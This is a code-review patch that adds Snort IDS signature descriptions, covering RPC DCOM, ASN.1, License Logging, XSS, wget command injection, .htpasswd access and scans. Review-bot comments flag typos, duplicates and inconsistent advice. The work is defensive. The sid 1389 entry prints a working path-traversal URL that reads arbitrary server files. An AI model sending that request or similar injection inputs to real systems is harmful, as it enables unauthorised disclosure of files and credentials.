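Review bot: the Impact section of 100000554.txt ("system integrity compromise", "administrative access to the server", "execution of arbitrary code") is the generic web-exploit paragraph and overstates a cross-site scripting flaw, which executes script in the victim's browser rather than on the server; align it with the Attack Scenarios already given (a malicious link that steals information from the user who clicks it) and the cgisecurity FAQ cited below. The Summary should also name the "tid" parameter and "error.php" script, which currently appear only in Detailed Information.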
--- /dev/null
+++ b/doc/signatures/3312.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3312
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
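Review bot: 3312.txt is byte-for-byte identical to 3281.txt earlier in this patch, including the "Expoit code exists" typo; the two rules presumably match different RPC requests or transports, and each file should say which, otherwise an analyst cannot tell the alerts apart. The Attack Scenarios wording ("overly long filename via a network share") should also be reconciled with the "malformed data via RPC" description above it.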
--- /dev/null
+++ b/doc/signatures/1330.txt
@@ -0,0 +1,50 @@
+Rule:
+
+--
+Sid:
+1330
+
+--
+Summary:
+Attempted wget command access via web
+
+--
+Impact:
+Attempt to gain information using wget to access sensitive files on a webserver.
+
+--
+Detailed Information:
+This is an attempt to gain intelligence from sensitive system files on a webserver. Wget is GNU software that allows for retrieval of files uing HTTP, HTTPS and FTP. The attacker could possibly gain information needed for other attacks on the system, including the retrieval of password files from a third party onto the target webserver.
+
+Using "wget", the attacker may be able to upload an exploit, IRC daemon or DDoS agent onto the server. The rule looks for the "wget" command in the URL part of the client to web server connection and does not indicate whether the command was actually successful in uploading or downloading the files. The presence of the "wget" command in the URL indicates that an attacker attempted to trick the web server into executing system commands in non-interactive mode i.e. without a valid shell session. Another case when this rule might trigger is unencrypted HTTP tunneling connection to the server.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains the path to wget and commands for wget in the URI, which can then return requested files to an external destination or onto the target server.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. Non-essential binaries should be removed from a webserver once it is in production.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+--
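Review bot: False Positives says "None Known" while Detailed Information itself names a benign trigger ("Another case when this rule might trigger is unencrypted HTTP tunneling connection to the server"), and any URL that merely contains the string "wget" (for example a download path for the wget package) will match a content rule on the URI; move those cases into False Positives. Also "uing" should be "using", "it's designated web root" should be "its", and the statement that the presence of "wget" in the URL "indicates that an attacker attempted to trick the web server into executing system commands" is stronger than the previous sentence, which says the rule cannot tell whether anything executed; "may indicate" keeps the two consistent. The separator line before Additional References has a trailing space ("-- ") that the other separators lack.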
--- /dev/null
+++ b/doc/signatures/980.txt
@@ -0,0 +1,63 @@
+Rule:
+
+
+--
+Sid:
+980
+
+--
+Summary:
+This event is generated when an attempt is made to disclose the contents of a file on an host running Stalkerlab's CGIMail server. 
+
+--
+Impact:
+Intelligence gathering activity.  This attack can display the contents of a file on the server.
+
+--
+Detailed Information:
+
+Stalkerlab's CGIMail is a CGI program that permits an HTTP server to send SMTP mail using the data from the HTLM form.  A vulnerability exits in the CGImail.exe program that can disclose the contents of files on the web server.  This can be accomplished by locally modifying the Web page that sends data to the SMTP server.  The modifications would include setting specific variable values to file names that the attacker wishes to examine.  
+
+
+--
+Affected Systems:
+Hosts running Stalkerlab CGIMail 1.1.2 
+
+--
+Attack Scenarios:
+An attacker can modify an HTML form used by Stalkerlab CGIMail that passes data to the SMTP server.  This can permit disclosure of file contents on the server. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+No known remedy or patch is available.
+ 
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1623
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0726
+
+--
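Review bot: typos in Summary and Detailed Information: "an host" should be "a host", "HTLM" should be "HTML", and "A vulnerability exits" should be "exists". Corrective Action ("No known remedy or patch is available.") leaves the reader with nothing to do; since Detailed Information names CGImail.exe as the vulnerable program, the section should at least recommend removing it or restricting access to it until a fixed version is available.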
--- /dev/null
+++ b/doc/signatures/1228.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1228
+
+--
+Summary:
+A nmap XMAS scan was detected.
+
+--
+Impact:
+System reconnaissance that may include open/closed/firewalled ports,
+ACLs.
+
+--
+Detailed Information:
+Nmap sets the URG PSH and FIN bits as part of it's XMAS scan.
+Typically, a closed port will respond with an ACK RST, whereas an open
+port may not respond at all.  However, this varies from machine to
+machine, and also depends on what (if any) filtering policies are in
+place between the hosts in question.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+As part of information gathering that may occur before a more
+dedicated attack, an attacker may choose to use nmap's XMAS scan to
+determine open/closed ports.
+
+__
+Ease of Attack:
+Trivial.  Nmap is freely available to anyone who wishes to use it.
+The only requirement is root/elevated privledges (the XMAS scan
+requires this) and a lack of proper filtering between the two
+machines.
+
+--
+False Positives:
+None Known. The FIN PSH and URG flags should never be seen together
+in normal TCP traffic.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine what ports may have responded as being open, and what clues
+that may give an attacker relating to potential attacks.
+Additionally, investigate the use of proper ingress/egress filtering.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+SANS:
+http://rr.sans.org/firewall/egress.php
+
+--
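Review bot: the separator before "Ease of Attack:" is "__" (two underscores) instead of "--", which breaks the section layout used in every other file and in anything that splits these documents on the "--" delimiter; fix it. Also "it's XMAS scan" should be "its", "privledges" should be "privileges", and "unkown" in Contributors should be "unknown".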
--- /dev/null
+++ b/doc/signatures/353.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+353
+
+--
+Summary:
+This event is generated when a remote user attempts to anonymously log into an internal FTP server with a suspicious password, indicating that an attacker may be scanning the FTP server for vulnerabilities using the ADMhack scanning tool.
+
+--
+Impact:
+Information gathering, possible unauthorized access. 
+
+--
+Detailed Information:
+ADMhack is a security scanner that scans for exploitable network vulnerabilities. When the scanner encounters an FTP server, it attempts to log in using "ddd@ " as a password.
+ 
+--
+Affected Systems:
+Computers running anonymous FTP servers.
+
+--
+Attack Scenarios:
+An attacker scans the network for vulnerable FTP servers using ADMhack scanner. When an FTP server is found, the tool attempts to log into the server. If vulnerabilities exist on the server, this may allow the attacker access to the FTP server in order to exploit them. 
+
+--
+Ease of Attack:
+Simple. ADMhack is freely available on the Internet.
+
+--
+False Positives:
+If a legitimate remote anonymous user uses the same password, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable anonymous FTP access.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
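Review bot: Detailed Information quotes the password as "ddd@ " with a trailing space inside the quotes; if the space is part of the string the rule matches, say so explicitly, and if it is not, drop it, because readers tuning the rule will otherwise not know whether "ddd@" alone should fire. Additional References is empty; a pointer to a description of the ADMhack scanner would help readers confirm the password string.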
--- /dev/null
+++ b/doc/signatures/1794.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1794
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "masturbation".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "masturbation".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
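Review bot: the Summary "a webpage was visited the included the content" should read "that included the content". The Additional References section carries six empty lines before the closing "--"; trim them to match the other files, and the "-- " separator before it has a trailing space. The False Positives observation that viewing the Snort rule descriptions themselves triggers this rule is worth keeping, since this very document will fire the signature when served over HTTP.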
--- /dev/null
+++ b/doc/signatures/919.txt
@@ -0,0 +1,62 @@
+SID:
+919
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
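Review bot: this file puts "SID:" before "Rule:" and ends with "References:" instead of "Additional References:", unlike every other signature file in this patch; reorder it to the common layout (Rule, Sid, Summary, ...) so tooling that parses these sections treats it the same way. Typos: "This even indicates" should be "This event indicates", "a Allaire" should be "an Allaire", "can be accesses" should be "can be accessed", and "at type of writing" should be "at time of writing".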
--- /dev/null
+++ b/doc/signatures/2384.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+2384
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
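Review bot: "taget" should be "target" and "excuted" should be "executed" in Detailed Information, and the last section is headed "References:" where the other files use "Additional References:". Detailed Information says exploitation is by "specially crafted authentication packets" without saying which protocol or port this sid inspects; state it, since a reader tuning the rule needs to know which traffic it applies to.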
--- /dev/null
+++ b/doc/signatures/120-1.txt
@@ -0,0 +1,65 @@
+Rule: 
+
+--
+Sid: 
+120-1
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+presence of a web server running on a non-defined port.
+
+Web server ports are defined in snort.conf as the variable $HTTP_PORTS
+and also in the section for http_inspect. When a server is accessed on a
+port not defined in snort.conf the presence of web traffic generates an
+event. This may indicate the presence of an unauthorized web server.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios: 
+A web server may be used to transfer files from inside the protected
+network to unauthorized recipients on the outside.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors: 
+Daniel Roelker <droelker@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
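Review bot: False Positives "None Known." contradicts Detailed Information, which says the event fires whenever HTTP is seen on a port not listed in $HTTP_PORTS or the http_inspect configuration; any legitimate web server on a non-standard port, or an incomplete port list, will generate this event and is by far its most common cause. Corrective Action ("Apply any appropriate vendor supplied patches") also does not follow from the event, which signals an unexpected web server rather than a vulnerability; the useful actions are to identify the server on that port and either add the port to $HTTP_PORTS so the traffic is normalized and inspected, or shut the server down if it is unauthorized.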
--- /dev/null
+++ b/doc/signatures/1071.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+--
+Sid:
+1071
+
+--
+Summary:
+This event is generated when an attempt is made to get a .htpasswd file from an HTTP server.
+
+--
+Impact:
+Serious. Although .htpasswd files cannot be accessed through the Apache HTTP service by default.
+
+--
+Detailed Information:
+The Apache HTTP server provides an authentication mechanism using .htaccess files and .htpasswd files.
+
+These files contain authentication information and encrypted passwords. However, older versions of Apache HTTPD for Windows systems the password might be stored in plaintext.
+
+In the default configuration, Apache HTTP server blocks any attempt to access .htaccess or .htpasswd files.
+
+--
+Attack Scenarios:
+The attacker could make a request to retrieve the .htpasswd file then use the information in it to launch a dictionary attack based on the usernames found.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+The .htpasswd file should be stored in a location outside the DocumentRoot for the webserver.
+
+The default configuration should include the following section to prevent access to .ht files:
+
+<Files ~ "^\.ht">
+    Order allow,deny
+    Deny from all
+</Files>
+
+Ensure the passwords stored in .htpasswd are encrypted.
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
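Review bot: the Impact section is a sentence fragment: "Serious. Although .htpasswd files cannot be accessed through the Apache HTTP service by default." needs a main clause (for example, "... by default, a misconfigured server may expose user names and password hashes."). Likewise "However, older versions of Apache HTTPD for Windows systems the password might be stored in plaintext." is missing its preposition ("on older versions ... the password might be"). Passwords in .htpasswd are hashed, not encrypted, so "encrypted passwords" and "Ensure the passwords stored in .htpasswd are encrypted" should say hashed. The `<Files ~ "^\.ht">` block uses the `Order allow,deny` / `Deny from all` directives, which are the Apache 2.2 access-control syntax; note the version the snippet targets, since Apache 2.4 replaced these with `Require all denied`.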
--- /dev/null
+++ b/doc/signatures/1635.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1635
+
+--
+Summary: 
+This event is generated when an attempt is made to exploit a potential 
+buffer overflow using the APOP command.  If running a vulnerable mail 
+server, such as older XMail versions, this attack may lead to remote 
+execution of arbitrary code.
+--
+Impact:
+When succesfully exploited, the remote attacker can crash the POP3
+service or execute arbitrary code on the mailserver.
+--
+Detailed Information:
+The APOP command, used to submit authentication credentials to the POP3 
+server, has an overflowable buffer in XMail 0.58 and earlier.  If an 
+argument to the APOP command is longer than 256 characters, the service 
+will crash.  This error may be exploitable further, and could then allow
+the attacker to execute arbitrary code on the remote system.
+
+--
+Affected Systems:
+	XMail 0.58 or earlier
+
+--
+Attack Scenarios:
+An attacker could crash the POP server, thereby denying
+legitimate users access to their e-mail.  Skilled attackers could
+compromise the mailserver and obtain all incoming e-mail data.
+
+--
+Ease of Attack:
+The DoS attack is trivial to execute, as only an argument
+longer than 256 characters needs to be submitted.  Compromise of the
+mailserver requires more skill, but has been proven to be possible..
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade the XtraMail installation to a more recent
+version.  The most recent versions can always be found on the vendor's
+website, http://www.xmailserver.org/
+
+--
+Contributors:
+Snort documentation contributed by Maarten Van Horenbeeck (maarten@daemon.be)
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10559
+
+Bugtraq
+http://www.securityfocus.com/bid/1652
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0841
+
+--
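Review bot: Corrective Action says "Upgrade the XtraMail installation" but the Summary, Detailed Information, Affected Systems and the vendor URL all refer to XMail; XtraMail is a different product, so this should read XMail. Also "succesfully" should be "successfully", the Ease of Attack paragraph ends in a double period ("possible.."), and the Summary and Impact sections lack the blank line before "--" that the other sections have.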
--- /dev/null
+++ b/doc/signatures/1839.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1839
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version.
+
+If the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
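Review bot: "legimately" in False Positives should be "legitimately". Affected Systems ("Many older versions of web server software are affected") places the flaw in the wrong component: as Detailed Information describes it, the bug is in an application that echoes unfiltered input into HTML, not in the web server, so the entry should say "any web application that reflects unfiltered input". Corrective Action asks only that the application "properly validates input"; because the problem is input being used "as part of the HTML of a new page without filtering", the advice should also mention encoding output when it is written into HTML, which is the step that actually closes the hole.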
--- /dev/null
+++ b/doc/signatures/1389.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+1389
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+script viewcode.jse.
+
+--
+Impact:
+Information disclosure. An attacker may have been able to read the
+contents of any file on the web server.
+
+--
+Detailed Information:
+Nombas ScriptEase WebServer Edition is a Javascript environment for web
+servers.  As shipped, it comes with a sample script called "viewcode.jse"
+that contains a vulnerability.  This vulnerability allows an attacker
+to view any file on the web server.  The web server that ships with
+Novell Netware 5.1 before SP3 contains this vulnerability.
+
+--
+Affected Systems:
+	Netware 5.1 and Nombas ScriptEase WebServer Edition
+ 
+--
+Attack Scenarios:
+Attacker sends a simple URL like the following:
+http://target/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/somefile
+
+--
+Ease of Attack:
+Simple handcrafted URL.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to see if a malicious web request was being done.
+Try to determine what the requested file was, and determine
+from the web server's configuration whether it was a threat or not
+(e.g., whether the requested file even existed and whether the web
+server contained the viewcode.jse sample script).  The existence of
+sample scripts on a web server may indicate larger vulnerabilities.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
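Review bot: Corrective Action never tells the reader how to remove the vulnerability that Detailed Information describes: the web server in Netware 5.1 before SP3 ships the vulnerable viewcode.jse, so the section should say to apply SP3 (or later) and to remove viewcode.jse and the other sample scripts from production servers. Also "unkown" in Contributors should be "unknown", and Affected Systems ("Netware 5.1 and Nombas ScriptEase WebServer Edition") should say "Netware 5.1 prior to SP3" to match the detailed text.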
--- /dev/null
+++ b/doc/signatures/111-13.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+111-13
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a stealth scan is in progress. That is, packets with both the SYN and FIN
+flags set have been detected. This is not normal behavior in TCP
+connections.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
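Review bot: Corrective Action ("Check the target host for signs of compromise" and apply patches) does not fit an event whose Impact is "This may indicate scanning activity"; a SYN/FIN scan has nothing to patch. The useful response is the one 1228.txt gives for the XMAS scan: determine which ports answered as open and what that tells the scanner, and review ingress filtering so the packets do not reach the host in the first place.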
--- /dev/null
+++ b/doc/signatures/369.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+369
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a BayRS Router.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a BayRS router contains a unique payload in the message request.  
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+
+Original rule written by Doug@Minderhout.com  
+Modified by Brian Caswell <bmc@sourcefire.com>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.whitehats.com/info/IDS444
+
+--
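Review bot: the Additional References entry is labelled "Bugtraq" but the URL (http://www.whitehats.com/info/IDS444) is a Whitehats arachNIDS entry, not a Bugtraq ID; relabel it. Also "legimately" should be "legitimately", and the Corrective Action "Block inbound ICMP echo requests." is blunter than the event warrants, given that False Positives itself notes echo requests are used for legitimate troubleshooting; "block inbound echo requests at the perimeter where they are not needed" is more accurate.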
--- /dev/null
+++ b/doc/signatures/3099.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3099
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
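Review bot: "Microsoft Windows Server 2000" in Affected Systems is not a product name; it should be "Microsoft Windows 2000 Server" (and the list reads better in release order: NT Server, 2000 Server, Server 2003). Additional References is empty for what the Summary calls a "known vulnerability"; add the Microsoft bulletin and CVE so the "Apply the appropriate vendor supplied patches" advice can be followed. There is also a stray blank line between the "--" separator and "Corrective Action:".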
--- /dev/null
+++ b/doc/signatures/3352.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3352
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
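Review bot: "Expoit" in Ease of Attack should be "Exploit". Attack Scenarios ("a request for a file with an overly long filename via a network share") does not visibly connect to Detailed Information, which describes a malformed DCOM request over RPC; say how the long filename reaches the RPC interface so the two sections agree. The firewall advice ("ports 135, 139 and 445 for both TCP and UDP") should list TCP and UDP separately, since 139 is the TCP NetBIOS session port and has no UDP service. Additional References is empty for a "known vulnerability in Microsoft RPC DCOM"; add the vendor bulletin and CVE.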
--- /dev/null
